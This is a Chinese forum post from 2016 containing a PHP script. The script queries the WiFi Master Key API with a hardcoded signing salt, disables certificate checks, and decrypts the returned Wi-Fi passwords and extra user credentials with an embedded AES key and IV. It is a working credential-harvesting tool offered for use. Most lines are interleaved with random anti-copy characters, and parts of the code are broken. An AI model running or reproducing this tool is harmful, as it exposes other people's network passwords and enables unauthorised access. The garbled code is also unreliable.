上尉
- 注册时间
- 2010-7-6
- 金币
- 1189 个
- 威望
- 18 个
- 荣誉
- 0 个
尚未签到
|
<form action="" method="post">
+ T( H6 C% u+ ?8 O8 c <p>ssid: <input type="text" name="ssid" /></p>" j( f+ a _) u& n" _# h# p6 h' {' |9 }
<p>bssid: <input type="text" name="bssid" /></p>
$ |8 |6 }( u |9 a, x, d <input type="submit" value="提交" />7 i ` e: B% ~# L* C5 y' C( C
</form>
7 R# g5 w3 X) g1 [
_0 }. T6 |% G2 k" Y( r7 k<?php
/ A# x* O9 B" M& E- ?6 Y9 N# d8 I$bssid = $_POST["bssid"] ;
5 Y5 R& H" Z: @5 T% U$ssid = $_POST["ssid"] ;3 }/ M( }; ^. ~/ {7 D4 w" \
if (isset( $bssid ) && isset( $ssid )){
7 H" K5 \( w6 v8 y ]//update salt& d+ ]7 m3 P0 v9 E
$ret = request( $bssid , $ssid , md5(rand(1, 10000)));
9 h9 i7 s$ R8 t o5 n$ f $ret = json_decode( $ret );4 v% M0 Y( y' R
$ret = request( $bssid , $ssid , $ret ->retSn);& d4 m& ]( J6 k7 ] Q$ l
$ret = json_decode( $ret );, _% k1 r8 F& q+ ?; ]* y$ K* a
if ( $ret ->retCd == 0){
6 H' Q: T6 \* a5 e: Y3 O8 p if ( $ret ->qryapwd->retCd == 0){
1 Y2 f9 B& ?( v $list = $ret ->qryapwd->psws;
5 d+ w: p5 R6 m9 [ foreach ( $list as $wifi ){
9 M, W" Y: d" A, f/ E& n, b% H0 g echo 'SSID: ' . $wifi ->ssid. "<br>" ;+ W g: C, {0 K5 P: g
echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;6 Z+ r. F1 O* ?1 ^
echo 'BSSID: ' . $wifi ->bssid. "<br>" ;; G* ^) g4 c% Z7 E; |
if ( $wifi ->xUser){
8 T( J- J" ^5 p0 U, W echo 'xUser: ' . $wifi ->xUser. "<br>" ;2 D2 W/ A, i* c. r( d/ a/ Z: Q
echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;
( K8 ]3 X3 u; X7 C# a+ }8 Q% Q }
( r# o1 W( r3 ?2 z ?3 }5 S" _) ^ }
6 [: {5 D, T& M0 {6 D( w }
( J. i; O! w0 R- j1 a" l8 i else {2 L" T, x; J3 U* l
echo $ret ->qryapwd->retMsg; \7 T1 z. u2 |, s" |
} G1 N7 x& ]9 g. y, y
}6 k4 A2 ?- f5 g$ @3 t5 E
}- |# i# ^; |2 [2 C: m
function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
! D' a- W5 G/ E/ k! J& n $data = array ();
1 l# r2 _( K' \ V* V' r $data [ 'appid' ] = '0008' ;
# i4 D* F4 Z& |5 t$ D) b) [ $data [ 'bssid' ] = $bssid ;
4 }* G; Q# e: I, r% t $data [ 'chanid' ] = 'gw' ;' H6 L- E' C' d5 ?0 B. v
$data [ 'dhid' ] = $dhid ;" {- @- z0 d+ W5 {& ?
$data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;
. `8 N! B- }1 Q4 l7 O) ]( I $data [ 'lang' ] = 'cn' ;9 E# s0 ?# o1 I; B( v
$data [ 'mac' ] = '60f81dad28dh' ;
3 L0 m( L) h* G $data [ 'method' ] = 'getDeepSecChkSwitch' ;
7 g+ r' b! l: |7 |, i b1 d5 I $data [ 'pid' ] = 'qryapwd:commonswitch' ;) V) x# v/ l; \
$data [ 'ssid' ] = $ssid ;1 i/ l' b2 l2 @
$data [ 'st' ] = 'm' ;
( q7 N% Z/ M+ b7 U4 K5 [1 t $data [ 'uhid' ] = 'a0000000000000000000000000000002' ;
+ [% F- Y% F9 ]9 O $data [ 'v' ] = '324' ;, O5 r9 [5 Q: f' A! H) X( w- n
$data [ 'sign' ] = sign( $data , $salt );
- Y6 g8 Y; |7 q. z* X& J* w* ` $curl = curl_init();
( w) J1 S+ Q1 j curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );" r5 o; B$ O+ V; Q v4 R
curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );2 J+ N6 q1 h u
curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
, E7 b: ~9 g% W5 m V curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
" C3 M7 o4 g, }) @ curl_setopt( $curl , CURLOPT_POST, true); // enable posting
! }* w) G3 k7 P) _# U8 U curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
( z9 N$ J( A% ~ curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload' h1 G( m$ r$ G) X8 P$ f ]6 @& l1 L
$r = curl_exec( $curl );) b3 k/ T% ?& s) B+ F
curl_close( $curl );1 Q, o( ^0 q7 ^ L
return $r ;
& m/ B# P( k% y$ @' d}% \+ D T7 \) ^
function registerNewDevice(){ d, d( n! M; {& j: i2 t- ?
$salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;) [: j' @; K5 d( I) m
$data = array ();( |# |3 g$ C6 `0 X1 Y* g
$data [ 'appid' ] = '0008' ;
' Y8 L3 l( [6 ~7 R! q2 k $data [ 'bssid' ] = $bssid ;: B6 ^ c2 W" x/ o7 n
$data [ 'chanid' ] = 'gw' ;
" P, i/ ~. `/ Y: c $data [ 'dhid' ] = $dhid ;; @2 y6 K/ h4 b4 P0 {' c$ D
$data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;. T% Q8 b7 S% X
$data [ 'lang' ] = 'cn' ;* e7 R; C# n n+ x
$data [ 'mac' ] = '60f81dad28de' ;
M4 q0 y7 ]# q $data [ 'method' ] = 'getDeepSecChkSwitch' ;
. P( x6 ~0 @ k6 s( {( R, H $data [ 'pid' ] = 'qryapwd:commonswitch' ;
8 W9 H7 ] O6 h' u $data [ 'ssid' ] = $ssid ;
) J7 ^6 H7 a, @. b8 T q$ h4 Z $data [ 'st' ] = 'm' ;- O0 X$ ~# r5 O. Y
$data [ 'uhid' ] = 'a0000000000000000000000000000001' ;2 Q1 _4 y* t2 C7 y- H9 h$ u
$data [ 'v' ] = '324' ;7 u! h' b0 G$ e6 n
$data [ 'sign' ] = sign( $data , $salt );" L# f: F9 u/ i
}
0 B' B2 o6 ]0 }& D2 Ifunction sign( $array , $salt ){0 h: x" |- Z& k# K# u) R
// 签名算法
! v8 e. u- L2 n8 J! D! _+ V0 t1 r $request_str = '' ;
* ]) r3 Y: Z1 b# f // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
/ Y9 w: L9 M) {6 o% a$ _- K ksort( $array );3 r. a8 I W) A; _' q( r
foreach ( $array as $key => $value ) {
7 X- Y' z% T! w' l. U; ] $request_str .= $value ;
, z& U" h+ Y& g. F }
0 x1 V, b- c) ]9 C# K N $sign = md5( $request_str . $salt );, `6 A# R; e4 U! u
return strtoupper ( $sign );
M8 f# I' [' D6 f$ d# _& N}
' D7 H" Z7 b1 V$ b2 Pfunction decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){8 l" S! F* P' E; a+ R, ]
//Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密% A4 {- Q! r( o% X& d' [: c3 G
//[length][password][timestamp]
4 v7 i1 P4 R" Z% C! v& L $decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
4 N5 E" L+ U A" ?1 h" m+ T' V m return substr (trim( $decrypted_string ),3,-13);
+ m' o9 ~9 ?9 Q} ?> |
评分
-
1
查看全部评分
-
|
[复制链接]
IP卡
狗仔卡
发表于 2016-8-22 03:03
显身卡
